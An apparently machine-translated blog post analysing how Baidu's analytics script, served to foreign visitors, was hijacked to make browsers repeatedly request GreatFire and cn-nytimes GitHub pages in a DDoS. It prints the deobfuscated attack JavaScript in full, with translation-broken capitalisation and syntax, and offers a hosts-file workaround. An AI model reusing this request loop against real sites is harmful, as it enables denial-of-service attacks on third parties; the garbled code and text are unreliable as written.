A trick to solve warning:malicious JavaScript detected on this domain

Temporary workaround:

Modify hosts and add "127.0.0.1 hm.baidu.com".

Detailed reason analysis: At noon today, brush the country's largest information security practitioners of the same sex dating community zone.wooyun.org, suddenly browser every 2 seconds on the window:

Malicious JavaScript detected on this domain

My first reaction is to not know which naughty zone to XSS again, immediately open the Developer tool analysis.

0x01 Details

Then immediately found that the window's JS is actually loaded from the GitHub:

But why does the cloud load JS from the GitHub, and still from the GreatFire and the New York Times mirrored loading.

The first response is that the page has XSS or JS was hijacked, looking for a half-day finally found, incredibly is

Hm.baidu.com/h.js

This JS is really loaded by clouds Yes, this is Baidu statistics of the JS code, open the inside is a simple encryption after the js,eval of a string of encoded content, casually found an online decryption looked down, found the following content:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21st 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

document.write ("<script src= ' http://libs.baidu.com/jquery/2.0.0/jquery.min.js ' >x3c/script>"); !window.jquery && document.write ("<script src= ' http://code.jquery.com/jquery-latest.js ' >x3c/script") > "); Startime = (new Date). GetTime (); var count = 0; function Unixtime () { var a = new Date; Return DATE.UTC (A.getfullyear (), A.getmonth (), A.getday (), a.gethours (), A.getminutes (), A.getseconds ())/1E3 } Url_array = ["Https://github.com/greatfire/", "https://github.com/cn-nytimes/"]; NUM = Url_array.length; function R_send2 () { var a = Unixtime ()% NUM; Get (Url_array[a]) } function Get (a) { var b; $.ajax ({ Url:a, DataType: "Script", Timeout:1e4, Cache:! 0, Beforesend:function () { RequestTime = (new Date). GetTime () }, Complete:function () { ResponseTime = (new Date). GetTime (); b = Math.floor (responsetime-requesttime); 3E5 > Responsetime-startime && (r_send (b), Count = 1) } }) } function R_send (a) { SetTimeout ("R_send2 ()", a) } SetTimeout ("R_send2 ()", 2E3);

Probably function is to close the cache every 2 seconds after loading

Url_array = ["Https://github.com/greatfire/", "https://github.com/cn-nytimes/"];

The two URLs inside

Asked the next wall of the small partners, they see the JS are normal, but through the outside the wall IP access

Http://hm.baidu.com/h.js

Will get the above JS file, every 2 seconds to request the two URLs.

Turning on Twitter, it appears that GitHub has been under DDoS attacks since March 18, and then GreatFire changed the content of the hacked page into

1	Alert ("Warning:malicious JavaScript detected on this domain")

window to block the way to prevent the cycle of JS implementation.

Fig. 3 Record of foreign IP traceroute to hm.baidu.com

It seems that DNS has not been hijacked, it seems to be the same as before the IP hijacked directly or directly in the HTTP protocol to replace the file.

Sweep the lower end of the mouth, only opened 80 and 443, after the HTTPS protocol access is the normal empty page (only with Referer will appear JS file).

When the author wants to carry out the capture analysis, the hijacking has stopped, and on Twitter it is seen that someone has analyzed the reference as follows:

Grab bag tracking, normal Baidu server back to my Japanese VPS ttl for the RESP return HTTP OK message TTL is 47, you can determine that there is intermediary equipment on the VPS sent a forged message.

It's outrageous, huh?

Suddenly remembered a sentence, before DNS was hijacked to a foreign server when a webmaster said:

They have weaponized their entire population.

It should now be:

They have weaponized their entire population of the Earth.